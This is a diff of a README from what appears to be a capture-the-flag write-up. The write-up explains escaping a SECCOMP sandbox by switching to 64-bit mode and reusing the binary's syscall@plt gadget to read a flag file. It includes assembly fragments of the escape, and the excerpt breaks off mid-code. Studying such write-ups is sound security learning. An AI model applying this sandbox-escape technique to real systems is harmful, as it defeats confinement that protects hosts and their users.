c7f-m0d3/sandbox_compat/README.md

             push    eax
             ret
         hijack_64:
+            /* Any code to execute in 64-bit mode */
 ```

-Once in 64-bit mode, we can bypass SECCOMP `instruction_pointer` rule by executing pre-existing gadgets locted above 4 GBytes.
+Once in 64-bit mode, we can bypass SECCOMP `instruction_pointer` rule by executing pre-existing gadgets located above 4 GBytes.
-One of available gadgets is `syscall@plt` from sandbox code itself:
+One of the available gadgets is `syscall@plt` from the sandbox binary:
 ```
 0000000000000ce0 <syscall@plt>:
  ce0:   ff 25 9a 22 20 00       jmp    QWORD PTR [rip+0x20229a]        # 202f80 <syscall@GLIBC_2.2.5>
 ```

-Remaining part of user-supplied code to read `flag` file:
+Using this gadget we can construct following code to read `flag` file:
 ```
         hijack_64:
             movabs  rax, 0x10000001e            /* address of kernel subroutine in kernelland entry page */